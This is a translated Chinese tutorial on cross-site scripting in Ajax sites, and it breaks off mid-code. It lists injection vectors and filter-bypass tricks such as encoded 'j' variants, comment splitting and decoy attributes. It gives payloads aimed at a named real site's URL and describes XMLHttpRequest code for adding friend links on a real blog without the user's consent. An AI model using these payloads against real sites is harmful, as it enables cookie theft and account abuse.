Ajax hacking (Monyer)

Source: Internet
Author: the light of dreams
Tags: control characters, java format

After I published "Ajax hacking" in the tenth issue, some readers raised the following questions about XSS: Why is XSS used in Ajax hacking? How does the XSS in Ajax hacking differ from traditional XSS? What are their respective advantages and disadvantages? Are the XSS vulnerabilities of large websites actually exploitable? Let's go through these in detail.

Ajax hacking

The term Ajax hacking first appeared in Billy Hoffman's "AJAX dangers" report, where he classified Samy and Yamanner as AJAX hacking. Before that they were described as Web worms (or XSS worms), but this form of attack had no clear definition. Here we discuss the XSS side of Ajax hacking in depth; for other types of Ajax attack, see the article "Top 10 Ajax Security Holes and Driving Factors" or its Chinese translation, "Top 10 Security Threats under Web".

In traditional XSS attacks the goal is usually to escalate permissions directly, or to obtain cookies and then escalate. The code is therefore executed through window.open, window.location or an iframe, which exposes its two major weaknesses: it does not spread, and it is easily noticed. Ajax hacking uses the new Ajax technology to change both the attack method and the target. In practice, after obtaining administrator permissions and file-modification rights, most people do only what those permissions allow; they rarely go after business secrets. This attack instead targets the client directly. Because all the data is fetched asynchronously it is very hard to notice, and by acting with the permissions of the user who is already logged on it can change user information directly, or even make the code spread automatically and so behave as a worm.

XSS usage

Traditionally, XSS code is inserted through the URL or a text area (textarea). For a site built with Ajax technology, however, the new form of Ajax hacking extends the insertion points to seven vectors: the URL field, input fields, textarea fields, embed, css, rss and xml.


An XSS URL generally takes the form (domain name)/(file name).(file format)?(field name)=(field content), where the field content is displayed or otherwise used somewhere on the page. Through the negligence of the site's developers, the field content is written into the page without any security check or filtering, so we only need to replace the field content with our XSS code to obtain a cross-site script. For example:

http://club.sohu.com/joke/1.htm?stra=<script>alert(document.cookie);</script>

However, this method usually requires tricking the user into clicking a link you forged in advance, for instance by posting it on a forum or sending it by e-mail as phishing.
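The pattern behind such a URL is a server that copies the field content straight into the page. The following is an added example, not code from the original article or from the site named above: a small query-string parser and two page renderers, the vulnerable one concatenating the field as-is and the fixed one applying output encoding for an HTML text context. The parser and the page template are hypothetical; the URL is the one quoted above, with no claim that the site behaves this way.

```javascript
// Added example (not from the original article): the "field content copied into the
// page" pattern behind a reflected XSS URL, beside the output-encoding fix.
// getField() and the <h1> template are hypothetical stand-ins for the server side.

// Minimal query-string parser: returns the decoded value of one field, or "".
function getField(url, name) {
  const q = url.indexOf("?");
  if (q < 0) return "";
  for (const pair of url.slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    const key = eq < 0 ? pair : pair.slice(0, eq);
    if (key !== name) continue;
    const raw = eq < 0 ? "" : pair.slice(eq + 1);
    try {
      return decodeURIComponent(raw.replace(/\+/g, " "));
    } catch (e) {
      return raw; // malformed percent-encoding: return it untouched
    }
  }
  return "";
}

// Vulnerable template: the field content is concatenated into the HTML as-is,
// so a value containing <script> becomes a live script element.
function renderUnsafe(url) {
  return "<h1>Joke: " + getField(url, "stra") + "</h1>";
}

// Output encoding for an HTML text/attribute context: the five characters that
// can change the parser's state are replaced with character references.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed template: same page, but the field content can no longer open a tag.
function renderSafe(url) {
  return "<h1>Joke: " + escapeHtml(getField(url, "stra")) + "</h1>";
}

// Does the rendered page contain a script element start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The URL quoted in the article, used here as the sample input.
const demoUrl =
  "http://club.sohu.com/joke/1.htm?stra=<script>alert(document.cookie);</script>";
```

Running renderUnsafe(demoUrl) yields a page with a real script element; renderSafe(demoUrl) shows the same text to the reader but the angle brackets arrive as &lt; and &gt;, so no tag is created.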

Input, textarea, and css XSS

Input, textarea and css XSS are the most widely used. Since css is really part of DHTML, their usage and the ways of bypassing filters are similar, and the relevant explanations and experiments follow below.

Embed XSS

Embed XSS is generally used on websites that allow videos, music or Flash to be inserted, by linking to a Flash file built to carry an XSS script, for example <embed src="xss.swf"></embed>. We construct a special .swf file and put the JS or VBS code, referenced through ActionScript, into an action of the Flash file; when a user visits the page, the cross-site script runs.

Rss and Xml XSS

This type of attack is generally used on sites that aggregate RSS and on some local RSS readers (it is said that XSS against a local RSS reader may make it possible to obtain host permissions, but I have not tried this). In addition, because an RSS file can be referenced from any site, such attacks are very easy to test and the effect is quite obvious. The following shows an example of calling a remote rss.xml locally without any filtering, and the filtered result when Google reads the same RSS.

Code Insertion Method

Because the inserted script is JS or VBS, the usual keywords are JavaScript, VbScript and expression. However, all three keywords can be omitted when the code is placed in a mouse or keyboard event handler, for example <INPUT onkeyup="alert(XSS);">. And because HTML does not follow the XHTML standard, the code can be inserted in the following ways:

1. Tag attribute values can be enclosed in double quotes, single quotes, or no quotes at all;

2. Attribute names and values can be upper case, lower case, or mixed;

3. Line breaks can be inserted, namely the line feed char(10) and the carriage return char(13), as well as tabs and spaces;

4. In a style attribute, the backslash "\" and the comment "/**/" can be inserted;

5. The inserted code can be converted to decimal or hexadecimal HTML character references;

6. Because you cannot know in advance which form a filter blocks, the decimal or hexadecimal references you insert can be padded with leading zeros and mixed at will;

7. The following encodings all produce the character "j" and are case insensitive (the article counts 15 such variants):

&#x6A; &#x06A; &#x006A; &#x0006A; // hexadecimal character references, padded with zeros

&#106; &#0106; &#00106; &#000106; // decimal character references

\x6A \u006A // hexadecimal escapes in JavaScript source

8. Other encodings, such as htmlEncode and URLEncode, can be used to encode the HTML and the URL.

As for the HTML tags that can carry code: frankly, almost any tag that accepts attributes can carry code, for example <b style="xss:expression(alert(XSS))">.

The tag attributes that can carry code are src, style, dynsrc (common in img and input; it can also be used to insert video), lowsrc (the preview thumbnail), mouse events (such as onmouseover), keyboard events (such as onkeypress), href (common in a and link), body onload, url attributes, and so on.

Filter Bypass Methods

Of course, no website simply lets you enter code; it usually filters the characters you enter. For the prepared code to still be inserted and executed, note that some key strings may be removed, such as "JavaScript". If that is the only filtering, bypassing it is trivial: wherever the string would appear, enter "javajavascriptscript" (or another split form) instead, and the filter's single deletion leaves the keyword intact. Of course, website programmers are not that naive and will apply various filters against you, so, combined with the "Code Insertion Method" above, we can summarize the following ways of bypassing a site's filtering:

1. Fill in with the ASCII code of the Control Character

Anyone familiar with ASCII knows that there are 33 control characters in total. Setting aside the first, &#00; (null), and the last, &#127; (del), the other 31 can be inserted at the head of the code to confuse the filter without affecting the execution of the original code, and they can be written in any of the encodings from point 7 of "Code Insertion Method". The tab, line feed and carriage return characters can be inserted anywhere in the code.

2. Insert obfuscation attributes

When entering ordinary text, we find that not every string containing "script" is filtered out; only special characters inside an HTML tag are. This gives us a way around the filter: insert another, obfuscating attribute before the attribute that carries the code, and put into that attribute characters the filter mistakes for the end of the tag, so that it believes the code sits outside the HTML tag. For example:

// double quotes and the ">" symbol inserted into the src attribute of the tag that precedes the script
<SCRIPT>[code]</SCRIPT>">

// an obfuscating "a" attribute
<SCRIPT a=">" SRC="xss.js"></SCRIPT>

3. Use annotator to separate

Because the browser ignores the comments of each kind of code, placing comments inside the code lets us fool the filter without affecting the normal operation of the XSS code. For example:

// CSS comments are /**/ and their contents are ignored; CSS also ignores the backslash "\" inside identifiers
<style>@im\port'\ja\vasc\ript:alert("XSS")';</style>

// comment-based obfuscation of expression()
exp/*<a style='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

// the HTML comment is <!-- comment -->
<style><!--</style><script>[code]//--></script>

4. js coding and calling

If the filter removes many characteristic strings, bypassing it with the steps above becomes tedious, so the typical scheme is to encode the JavaScript itself, or simply to load the code from an external file. Note that when the loaded code uses XMLHttpRequest, the browser's same-origin policy requires the requested URL to be on the same server as the page; otherwise the request fails with an error.

Asynchronous Data Call

Since this is Ajax hacking, asynchronous data calls are naturally used. Here we briefly introduce the relevant knowledge; a deeper understanding comes from long-term practice.

1. Declare the xmlhttprequest object

Before calling data, you must declare the XMLHttpRequest object. The simplest form in IE6 and earlier is:

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

In IE7 and Firefox the declaration is:

var req = new XMLHttpRequest();

So, to write code with better compatibility, we can test the client browser and create the object accordingly:

var XmlHttp;
if (window.XMLHttpRequest) {
    XmlHttp = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}

Then the request is issued as follows:

XmlHttp.open("POST", "URL", true);
XmlHttp.send(null);

Here the first argument of XmlHttp.open is the request method, which can be POST, GET or HEAD; the third argument is true for asynchronous mode and false for synchronous mode.
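The snippet above creates the object and fires the request but does not show how the response comes back. The following is an added example, not code from the original article: the same cross-browser construction wrapped in an asynchronous POST helper with the readyState and status handling, taking the window-like object as a parameter so it can be exercised outside a browser. FakeXhr and the "/friend/add" URL are constructed stand-ins for this demonstration, not a real browser API or any real site's endpoint.

```javascript
// Added example (not from the original article): cross-browser XHR creation plus an
// asynchronous POST helper. FakeXhr and "/friend/add" are constructed stand-ins.

// Use whichever implementation the host provides: the standard constructor (IE7+,
// Firefox) or the ActiveX control (IE6 and earlier).
function createXhr(win) {
  if (win.XMLHttpRequest) {
    return new win.XMLHttpRequest();
  }
  if (win.ActiveXObject) {
    return new win.ActiveXObject("Microsoft.XMLHTTP");
  }
  throw new Error("no XMLHttpRequest implementation available");
}

// Asynchronous POST: open() is called with async = true, so send() returns at once
// and the callback runs when readyState reaches 4 (DONE). In a real browser the
// victim's cookies for the page's origin ride along automatically, which is what
// lets an injected script act with the logged-in user's permissions.
function asyncPost(win, url, body, callback) {
  const xhr = createXhr(win);
  xhr.onreadystatechange = function () {
    if (xhr.readyState !== 4) return;
    callback(xhr.status, xhr.responseText);
  };
  xhr.open("POST", url, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(body);
  return xhr;
}

// Constructed stand-in for the browser object: records every call and lets the
// caller deliver a response later, imitating the network answering.
class FakeXhr {
  constructor() {
    this.readyState = 0;
    this.status = 0;
    this.responseText = "";
    this.calls = [];
    this.onreadystatechange = null;
  }
  open(method, url, async) { this.calls.push(["open", method, url, async]); this.readyState = 1; }
  setRequestHeader(name, value) { this.calls.push(["header", name, value]); }
  send(body) { this.calls.push(["send", body]); }
  complete(status, text) {
    this.status = status;
    this.responseText = text;
    this.readyState = 4;
    if (this.onreadystatechange) this.onreadystatechange();
  }
}

// Drive one request through the helper and report what was observed. The URL and
// body are hypothetical; nothing here talks to a real server.
function demo(win = { XMLHttpRequest: FakeXhr }) {
  const seen = {};
  const xhr = asyncPost(win, "/friend/add", "uid=12345", (status, text) => {
    seen.status = status;
    seen.text = text;
  });
  const returnedBeforeResponse = seen.status === undefined; // send() did not block
  xhr.complete(200, "OK");
  return { calls: xhr.calls, returnedBeforeResponse, status: seen.status, text: seen.text };
}
```

In a browser you would pass window as the first argument; the point of the fake is only to show the order of events, which is what makes the attack quiet: the page keeps running while the request completes in the background.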

With the code above you can, on the TOM blog, add any user as a friend link of the current user. If the link is added successfully an OK window appears; otherwise "friended" is returned. The code is as follows:

var XmlHttp = new ActiveXObject("Microsoft.XMLh
